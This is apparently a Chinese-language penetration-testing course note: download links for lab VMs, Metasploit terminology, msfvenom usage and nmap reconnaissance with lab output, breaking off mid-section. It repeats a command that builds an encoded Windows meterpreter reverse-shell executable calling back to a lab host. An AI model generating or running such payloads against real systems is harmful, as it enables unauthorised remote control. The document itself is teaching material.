Windows 2000 Professional

鏈接:https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm

提取碼:upsm

Windows Server 2003 Standard x64 Edition

鏈接:https://pan.baidu.com/s/1Ro-BoTmp-1kq0W_lB9Oiww?pwd=ngsb

提取碼:ngsb

Windows 7 x64

鏈接:https://pan.baidu.com/s/1-vLtP58-GXmkau0OLNoGcg?pwd=zp3o

提取碼:zp3o

Debian 6(Kali Linux)

鏈接:https://pan.baidu.com/s/1Uw6SXS8z_IxdkNpLr9y0zQ?pwd=s2i5

提取碼:s2i5

安裝了Apatche、Tomcat、MySQL、 vsftpd并且配套Web安全測試練習教案

cd /usr/local/apache-tomcat-8.5.81/bin ./startup.shservice mysql start

打開瀏覽器輸入127.0.0.1:8080/sec/

Metasploitable2-Linux (with vsftpd 2.3.4)

鏈接:https://pan.baidu.com/s/1a71zOXGi_9aLrXyEnvkHwQ?pwd=17g6

提取碼:17g6

解壓后直接為vmx文件,直接可用

基本概念

通訊協議

ARP

ICMP

TCP

專業術語

滲透攻擊(Exploit)

測試者利用它來攻擊一個系統,程序,或服務,以獲得開發者意料之外的結果。常見的有內存溢出,網站程序漏洞利用,配置錯誤exploit。

攻擊載荷(Payload)

我們想讓被攻擊系統執行的程序,如reverse shell 可以從目標機器與測試者之間建立個反向連接,bind shell 綁定一個執行命令的通道至測試者的機器。payload 也可以是能在目標機器上執行有限命令的程序。

Shellcode

是進行攻擊時的一系列被當作payload 的指令,通常在目標機器上執行之后提供一個可執行命令的shell

模塊(Module)

MSF 的模塊,由一系列代碼組成。

監聽器(Listener)

等待來自被攻擊機器的incoming 連接的監聽在測試者機器上的程序。

編碼器(encoders)

msfencode –l 查看可用的編碼器(encoders),效果最佳的是x86/shikata_ga_nai

Metasploit用戶接口

MSF終端

#msfconsolemsf6>help connect

MSF命令行

#msfconsole -x script; set rhost [ip]; set lhost [ip]; set PAYLOAD “…”;run#msfconsole -r path/xxx.rc

Armitage

安裝

下載Armitage:https://gitlab.com/kalilinux/packages/armitage

解壓armitage

注釋掉所有

產生被控端與主控端

掃描

Metasploit功能程序

MSF攻擊荷載生成器

# msfvenom -h MsfVenom - a Metasploit standalone payload generator.Also a replacement for msfpayload and msfencode.Usage: /usr/bin/msfvenom [options]Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=-f exe -o payload.exe

Options:

MSF編碼器

# msfvenom -l encodersFramework Encoders [--encoder]

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

MSF攻擊載荷

# msfvenom -l payloads

MSF NOP

# msfvenom -l nopsFramework NOPs (11 total)=========================    Name             Description    ----             -----------    aarch64/simple   Simple NOP generator    armle/simple     Simple NOP generator    cmd/generic      Generates harmless padding for command payloads.    mipsbe/better    Better NOP generator    php/generic      Generates harmless padding for PHP scripts    ppc/simple       Simple NOP generator    sparc/random     SPARC NOP generator    tty/generic      Generates harmless padding for TTY input    x64/simple       An x64 single/multi byte NOP instruction generator.    x86/opty2        Opty2 multi-byte NOP generator    x86/single_byte  Single-byte NOP generator MSF平臺

MSF平臺

# msfvenom -l platformsFramework Platforms [--platform]========================================    Name    ----    aix    android    apple_ios    arista    brocade    bsd    bsdi    cisco    firefox    freebsd    hardware    hpux    irix    java    javascript    juniper    linux    mainframe    mikrotik    multi    netbsd    netware    nodejs    openbsd    osx    php    python    r    ruby    solaris    unifi    unix    unknown

Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

MSF有效負載和--編碼器的體系結構

# msfvenom -l archsFramework Architectures [--arch]========================================    Name    ----    aarch64    armbe    armle    cbea    cbea64    cmd    dalvik    firefox    java    mips    mips64    mips64le    mipsbe    mipsle    nodejs    php    ppc    ppc64    ppc64le    ppce500v2    python    r    ruby    sparc    sparc64    tty    x64    x86    x86_64zarch

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

MSF應用于外殼代碼的加密或編碼類型

# msfvenom -l encryptFramework Encryption Formats [--encrypt]================================================    Name    ----    aes256    base64    rc4    xor

MSF文件格式

# msfvenom -l formatsmsfvenom -l formatsFramework Executable Formats [--format]===============================================    Name    ----    asp    aspx    aspx-exe    axis2    dll    elf    elf-so    exe    exe-only    exe-service    exe-small    hta-psh    jar    jsp    loop-vbs    macho    msi    msi-nouac    osx-app    psh    psh-cmd    psh-net    psh-reflection    python-reflection    vba    vba-exe    vba-psh    vbs    warFramework Transform Formats [--format]==============================================    Name    ----    base32    base64    bash    c    csharp    dw    dword    hex    java    js_be    js_le    num    perl    pl    powershell    ps1    py    python    raw    rb    ruby    sh    vbapplication    vbscript

 msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

查看配置

# msfvenom -p moduleName --list-options

比如:

msfvenom -p windows/shell_reverse_tcp --list-options

Nasm shell

Netwide Assembler (簡稱 NASM)是一款基于x86架構的匯編與反匯編軟件。它可以用來編寫16位(8086、80286等)、32位(IA-32)和64位(x86_64)的程序。NASM被認為是Linux平臺上最受歡迎的匯編工具之一。

NASM 最初是在朱利安·霍爾(Julian Hall)的協助下由西蒙·泰瑟姆(Simon Tatham)開發的。截至2016年,它被一個由Hans Peter Anvin領導的小團隊所維護。 它是一款基于簡化版BSD許可證(2-clause BSD License)的開放源代碼軟件。

cd /usr/share/metasploit-framework/tools/exploit# ./nasm_shell.rb nasm > jmp esp00000000  FFE4              jmp espnasm >

Metasploit Express & Metasploit Pro

信息收集

被動信息搜索

Whois

格式

msf > whois example.commsf> whois 192.168.1.100

例子

msf6 > whois 3testing.com[*] exec: whois 3testing.com   Domain Name: 3TESTING.COM   Registry Domain ID: 513017975_DOMAIN_COM-VRSN   Registrar WHOIS Server: grs-whois.hichina.com   Registrar URL: http://www.net.cn   Updated Date: 2017-06-27T15:41:17Z   Creation Date: 2006-07-09T13:24:36Z   Registry Expiry Date: 2023-07-09T13:24:36Z   Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.   Registrar IANA ID: 420   Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com   Registrar Abuse Contact Phone: +86.95187   Domain Status: ok https://icann.org/epp#ok   Name Server: DNS10.HICHINA.COM   Name Server: DNS9.HICHINA.COM   DNSSEC: unsigned   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/>>> Last update of whois database: 2022-06-20T04:09:37Z <<<

msf6 > whois 123.56.135.186[*] exec: whois 123.56.135.186% [whois.apnic.net]% Whois data copyright termshttp://www.apnic.net/db/dbcopyright.html% Information related to '123.56.0.0 - 123.57.255.255'% Abuse contact for '123.56.0.0 - 123.57.255.255' is 'ipas@cnnic.cn'inetnum:123.56.0.0 - 123.57.255.255netname:ALISOFTdescr:  Aliyun Computing Co., LTDdescr:  5F, Builing D, the West Lake International Plaza of S&Tdescr:  No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099country:CNadmin-c:ZM1015-APtech-c: ZM877-APtech-c: ZM876-APtech-c: ZM875-APabuse-c:AC1601-APstatus: ALLOCATED PORTABLEmnt-by: MAINT-CNNIC-APmnt-irt:IRT-CNNIC-CNlast-modified:  2021-06-16T01:25:33Zsource: APNICirt:IRT-CNNIC-CNaddress:Beijing, Chinae-mail: ipas@cnnic.cnabuse-mailbox:  ipas@cnnic.cnadmin-c:IP50-APtech-c: IP50-APauth:   # Filteredremarks:Please note that CNNIC is not an ISP and is notremarks:empowered to investigate complaints of network abuse.remarks:Please contact the tech-c or admin-c of the network.mnt-by: MAINT-CNNIC-APlast-modified:  2021-06-16T01:39:57Zsource: APNICrole:   ABUSE CNNICCNaddress:Beijing, Chinacountry:ZZphone:  +000000000e-mail: ipas@cnnic.cnadmin-c:IP50-APtech-c: IP50-APnic-hdl:AC1601-APremarks:Generated from irt object IRT-CNNIC-CNabuse-mailbox:  ipas@cnnic.cnmnt-by: APNIC-ABUSElast-modified:  2020-05-14T11:19:01Zsource: APNICperson: Li Jiaaddress:NO.969 West Wen Yi Road, Yu Hang District, Hangzhoucountry:CNphone:  +86-0571-85022088e-mail: jiali.jl@alibaba-inc.comnic-hdl:ZM1015-APmnt-by: MAINT-CNNIC-APlast-modified:  2014-07-30T02:02:01Zsource: APNICperson: Guoxin Gaoaddress:5F, Builing D, the West Lake International Plaza of S&Taddress:No.391 Wen'er Road, Hangzhou Cityaddress:Zhejiang, China, 310099country:CNphone:  +86-0571-85022600fax-no: +86-0571-85022600e-mail: anti-spam@list.alibaba-inc.comnic-hdl:ZM875-APmnt-by: MAINT-CNNIC-APlast-modified:  2014-07-30T01:56:01Zsource: APNICperson: security troublee-mail: yitian.gaoyt@alibaba-inc.comaddress:5th,floor,Building D,the West Lake International Plaza of S&T,391#Wen??r Roadaddress:Hangzhou, Zhejiang, Chinaphone:  +86-0571-85022600country:CNmnt-by: MAINT-CNNIC-APnic-hdl:ZM876-APlast-modified:  2021-04-13T23:22:33Zsource: APNICperson: Guowei Panaddress:5F, Builing D, the West Lake International Plaza of S&Taddress:No.391 Wen'er Road, Hangzhou Cityaddress:Zhejiang, China, 310099country:CNphone:  +86-0571-85022088-30763fax-no: +86-0571-85022600e-mail: guowei.pangw@alibaba-inc.comnic-hdl:ZM877-APmnt-by: MAINT-CNNIC-APlast-modified:  2013-07-09T01:34:02Zsource: APNIC% Information related to '123.56.128.0/19AS4837'route:  123.56.128.0/19descr:  CNC Group CHINA169 Fujian Province Networkdescr:  Addresses from APNIC(YJZXNET)country:CNorigin: AS4837mnt-by: MAINT-CNCGROUP-RRlast-modified:  2008-09-04T07:55:26Zsource: APNIC% This query was served by the APNIC Whois Service version 1.88.16 (WHOIS-AU3)

netcraft

https://www.netcraft.com/

https://searchdns.netcraft.com/

Maltego

sn0int

安裝

# apt install debian-keyring# gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -# apt-key adv --keyserver keyserver.ubunt.com --refresh-keys dit@rxv.cc# echo deb http://apt.vulns.sexy stable main>/etc/apt/sources.list.d/apt-vulns-key.list# apt update# apt install sn0int#sn0int[sn0int][default] > pkg quickstart

使用

[sn0int][default] > workspace demo[+] Connecting to database[sn0int][demo] > add domain[?] Domain: baidu.com[sn0int][demo] > select domains#1, "baidu.com"[sn0int][demo] > use ctlogs[sn0int][demo][kpcyrd/ctlogs] > run[sn0int][demo] > use ctlogs[sn0int][demo][kpcyrd/ctlogs] > run[*] "baidu.com"             : Adding subdomain "durobotdev.baidu.com"[*] "baidu.com"             : Adding subdomain "play-infoflow.baidu.com"[*] "baidu.com"             : Adding subdomain "www.play-infoflow.baidu.com"[*] "baidu.com"            : Adding subdomain "dlswbr.baidu.com"[*] "baidu.com"            : Adding subdomain "otapcdn.baidu.com"[*] "baidu.com"            : Adding subdomain "foundation.baidu.com"[*] "baidu.com"            : Adding subdomain "mdm-duguanjia.baidu.com"[*] "baidu.com"            : Adding subdomain "lookup.api.bsb.baidu.com"[*] "baidu.com"            : Adding subdomain "download.api.bsb.baidu.com"[*] "baidu.com"           : Adding subdomain "duke.baidu.com"[*] "baidu.com"           : Adding subdomain "ditan.huodong.baidu.com"[*] "baidu.com"           : Adding subdomain "httpsdns.baidu.com"[*] "baidu.com"           : Adding subdomain "vpn.baidu.com"[*] "baidu.com"           : Adding subdomain "otacdn.baidu.com"[*] "baidu.com"           : Adding subdomain "trafficsafe.baidu.com"

ZoomEye

nslookup

msf6 > nslookupset type=mxexample.com

例子

msf6 > nslookup www.3testing.com[*] exec: nslookup www.3testing.comServer: 8.8.8.8Address:8.8.8.8#53Non-authoritative answer:Name:   www.3testing.comAddress: 123.56.135.186msf6 > nslookup www.3testing.com[*] exec: nslookup www.3testing.comServer:       192.168.0.1Address:       192.168.0.1#53Non-authoritative answer:Name:       www.3testing.comAddress: 123.56.135.186

Google Hacking

主動信息搜索

namp掃描

最基本的掃描

#nmap 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:09 CSTNmap scan report for 192.168.0.106Host is up (0.0028s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds

掃描活躍的主機 -sn

#nmap -sn 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:13 CSTNmap scan report for 192.168.0.106Host is up (0.00066s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

掃描多臺機器

利用IP1IP2 … IPn

# nmap 192.168.0.106 192.168.0.150 192.168.0.158 192.168.0.160Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:27 CSTNmap scan report for 192.168.0.106Host is up (0.0017s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap scan report for 192.168.0.158Host is up (0.0087s latency).Not shown: 991 closed tcp ports (reset)PORT      STATE SERVICE135/tcp   open  msrpc139/tcp   open  netbios-ssn445/tcp   open  microsoft-ds49152/tcp open  unknown49153/tcp open  unknown49154/tcp open  unknown49155/tcp open  unknown49156/tcp open  unknown49157/tcp open  unknownMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.160Host is up (0.0017s latency).Not shown: 977 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp22/tcp   open  ssh23/tcp   open  telnet25/tcp   open  smtp53/tcp   open  domain80/tcp   open  http111/tcp  open  rpcbind139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds512/tcp  open  exec513/tcp  open  login514/tcp  open  shell1099/tcp open  rmiregistry1524/tcp open  ingreslock2049/tcp open  nfs2121/tcp open  ccproxy-ftp3306/tcp open  mysql5432/tcp open  postgresql5900/tcp open  vnc6000/tcp open  X116667/tcp open  irc8009/tcp open  ajp138180/tcp open  unknownMAC Address: 00:0C:29:FA:DD:2A (VMware)Nmap scan report for 192.168.0.150Host is up (0.0000040s latency).Not shown: 998 closed tcp ports (reset)PORT   STATE SERVICE21/tcp open  ftp80/tcp open  httpNmap done: 4 IP addresses (4 hosts up) scanned in 1.08 seconds

利用IP1-IP2

# nmap 192.168.0.100-160                                       Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:39 CSTNmap scan report for 192.168.0.106Host is up (0.00058s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap scan report for 192.168.0.151Host is up (0.016s latency).Not shown: 994 closed tcp ports (reset)PORT     STATE SERVICE135/tcp  open  msrpc139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh5357/tcp open  wsdapiMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.158Host is up (0.016s latency).Not shown: 991 closed tcp ports (reset)PORT      STATE SERVICE135/tcp   open  msrpc139/tcp   open  netbios-ssn445/tcp   open  microsoft-ds49152/tcp open  unknown49153/tcp open  unknown49154/tcp open  unknown49155/tcp open  unknown49156/tcp open  unknown49157/tcp open  unknownMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.159Host is up (0.012s latency).All 1000 scanned ports on 192.168.0.159 are in ignored states.Not shown: 1000 closed tcp ports (reset)MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.150Host is up (0.0000030s latency).Not shown: 998 closed tcp ports (reset)PORT   STATE SERVICE21/tcp open  ftp80/tcp open  httpNmap done: 61 IP addresses (5 hosts up) scanned in 4.12 seconds

利用IP/24

#nmap192.169.0.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:34 CSTNmap scan report for 192.168.0.1Host is up (0.0086s latency).Not shown: 998 closed tcp ports (reset)PORT     STATE SERVICE80/tcp   open  http1900/tcp open  upnpMAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)Nmap scan report for 192.168.0.106Host is up (0.0011s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap scan report for 192.168.0.151Host is up (0.017s latency).Not shown: 994 closed tcp ports (reset)PORT     STATE SERVICE135/tcp  open  msrpc139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh5357/tcp open  wsdapiMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.158Host is up (0.021s latency).Not shown: 991 closed tcp ports (reset)PORT      STATE SERVICE135/tcp   open  msrpc139/tcp   open  netbios-ssn445/tcp   open  microsoft-ds49152/tcp open  unknown49153/tcp open  unknown49154/tcp open  unknown49155/tcp open  unknown49156/tcp open  unknown49157/tcp open  unknownMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.159Host is up (0.013s latency).All 1000 scanned ports on 192.168.0.159 are in ignored states.Not shown: 1000 closed tcp ports (reset)MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.161Host is up (0.00029s latency).Not shown: 977 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp22/tcp   open  ssh23/tcp   open  telnet25/tcp   open  smtp53/tcp   open  domain80/tcp   open  http111/tcp  open  rpcbind139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds512/tcp  open  exec513/tcp  open  login514/tcp  open  shell1099/tcp open  rmiregistry1524/tcp open  ingreslock2049/tcp open  nfs2121/tcp open  ccproxy-ftp3306/tcp open  mysql5432/tcp open  postgresql5900/tcp open  vnc6000/tcp open  X116667/tcp open  irc8009/tcp open  ajp138180/tcp open  unknownMAC Address: 00:0C:29:FA:DD:2A (VMware)Nmap scan report for 192.168.0.150Host is up (0.0000040s latency).Not shown: 998 closed tcp ports (reset)PORT   STATE SERVICE21/tcp open  ftp80/tcp open  httpNmap done: 256 IP addresses (7 hosts up) scanned in 5.18 seconds

使用ICMP對設備進行掃描

使用ICMP類似Ping的請求響應掃描 -PE

#nmap -PE 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:44 CSTNmap scan report for 192.168.0.106Host is up (0.00018s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

使用ICMP時間戳響應掃描 -PP

#nmap -PP 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:55 CSTNmap scan report for 192.168.0.106Host is up (0.0021s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds

使用ICMP掩碼掃描 -PM

#nmap -PM 192.168.0.106

使用TCP對設備進行掃描

使用TCP SYN對設備進行掃描 - PS

#nmap -PS 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:02 CSTNmap scan report for 192.168.0.106Host is up (0.0022s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds

使用TCP ACK對設備進行掃描 -PA

# nmap -PA 192.168.0.106 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:05 CSTNmap scan report for 192.168.0.106Host is up (0.00017s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.42 seconds

使用UDP對設備進行掃描 -PU

UDP掃描更簡單,但是不如TCP方便,且慢。

#nmap -PU 192.168.0.106tarting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 18:36 CSTNmap scan report for 192.168.0.106Host is up (0.00076s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds

對端口進行掃描

端口種類

l公有端口(Well Know Port):0-1024

l注冊端口(Registered Port):1025-49,151

l動態/私有端口(Dynamic/Private Port):49,152-65,535

端口狀態

lOpen:開放狀態。nmap 發起兩個 SYN 的請求,服務器上監聽在此端口的進程會進行應答,會返回 SYN/ACK, nmap 收到服務端返還回來的應答后會發送兩個 RST ,并不會和服務端建立通信連接,完成端口的探測。

lClosed:關閉狀態。nmap 發起兩個 SYN 的請求,服務器上由于沒有進程監聽該端口,內核會返回 RST, nmap 收到服務端返還回來的 RST 報文,將探測結果定義為 closed 。

lFiltered:過濾狀態。這種情況是服務端將收到的 nmap SYN 報文直接丟棄,不進行應答,由于 nmap 直接發送了兩個 SYN 報文,都沒有收到應答,所以認定服務端開啟了防火墻,將 SYN 報文丟棄。

lUnfiltered:未過濾狀態。nmap 默認進行的是 SYN 掃描,當用 -sA 選項( TCP ACK 掃描),連續發送兩個同樣的 ACK 報文,由于 snmp 確認收到了一個服務端根本沒有發送的報文,所以服務端會發送一個 RST 報文, snmp 收到服務端發送來的 RST 報文后,確認服務端沒有對報文進行丟棄處理,注意本探測不能發現端口是開放還是關閉狀態,只能確認探測的報文服務端已收到,并回復給了 snmp RST報文。

lopen|filtered:開放或過濾狀態。這種狀態主要是nmap無法區別端口處于 open 狀態還是 filtered 狀態。這種狀態長出現于UDP端口,參考后續 UDP 中的解釋。

lclosed|filtered:關閉或者過濾狀態。

掃描技術

不掃描端口 -sn

# nmap -sn 192.168.0.106 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:26 CSTNmap scan report for 192.168.0.106Host is up (0.0011s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

# nmap -sn -PE 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:27 CSTNmap scan report for 192.168.0.106Host is up (0.00055s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds

# nmap -sn 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:30 CSTNmap scan report for 192.168.0.1Host is up (0.0043s latency).MAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)Nmap scan report for 192.168.0.106Host is up (0.00036s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap scan report for 192.168.0.151Host is up (0.12s latency).MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.158Host is up (0.12s latency).MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.159Host is up (0.086s latency).MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.161Host is up (0.00032s latency).MAC Address: 00:0C:29:FA:DD:2A (VMware)Nmap scan report for 192.168.0.150Host is up.Nmap done: 256 IP addresses (7 hosts up) scanned in 2.40 seconds

SYN 半開掃描 -sS

NMAP機器àSYNà機器

機器àSYN+ACKàNMAP機器

NMAP機器àRSTà機器(連接斷開)

返回Open、Closed、filtered

#nmap -sS 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:33 CSTNmap scan report for 192.168.0.106Host is up (0.0011s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds

Connect掃描 -sT

完成3次握手

NMAPà機器àSYNà機器

機器àSYN+ACKàNMAP機器

NMAP機器àACK機器(連接建立)

